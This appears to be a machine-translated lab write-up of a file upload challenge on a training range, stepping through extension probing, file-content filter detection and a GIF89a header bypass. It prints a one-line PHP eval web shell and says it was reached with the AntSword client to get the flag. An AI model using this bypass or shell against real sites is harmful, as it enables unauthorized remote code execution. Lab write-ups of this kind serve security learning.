File upload vulnerability - simple exploitation 2 (Mozhe college shooting range)

File upload vulnerability — Make simple use of （ Mexican Academy shooting range ）

explain ： The website information involved in this article is the shooting range environment of Moher College , It doesn't involve the real environment of the Internet , Just for learning .

Upload ideas ：

Step one ： Determine the web site support file format .
From the website function point or topic description, you can judge the location , This function node supports uploading image formats （JPG,GIF and PNG etc. ） file , Try uploading a file named poc.jpg and poc.php Pictures of the ： Judge whether the website supports JPG Format file upload
poc.jpg Format uploaded successfully ：

poc.php Format upload failed ：

Step two ： Judge whether the website is a blacklist , The white list is also a file content detection method .
By uploading malformed file names poc.php.jar, File upload failed , It can be judged that the probability here is in the way of white list or file content detection （ Because if it is intercepted in the form of blacklist , Many malformed extensions will not be blocked ）
Step three ： Determine whether to intercept the file content .
Create a file named poc.jpg The file of , The contents of the file are ordinary strings , File upload failed , It can be judged that this website is intercepted in the form of file content .

File content filtering ：
1, Blacklist method . Script string detection , Detect, for example <?php,<% And so on
2, White list method . File header feature file mode , for example GIF Picture file header exists GIF89a features
Step four ： Determine the file filtering method
By creating files poc.gif, File header add GIF File header characteristics GIF89a, Other contents are random strings , File upload succeeded , Judge that the filtering method of the website is to filter the white list of file contents

File upload succeeded ：

step 5： Try to bypass site filtering , Upload script suffix file

 Create name as poc.php The file of , The content is GIF89a <?php  @eval($_POST["x"]); ?>, File upload succeeded 

step 6： Use the Chinese ant sword to connect to the website , Website connection succeeded , Get FLAG

Articles involving learning content ：
Web Security — File upload vulnerability
Common picture file header features
File upload vulnerability — In a word, picture horse production
Web In depth analysis of security — Upload the loopholes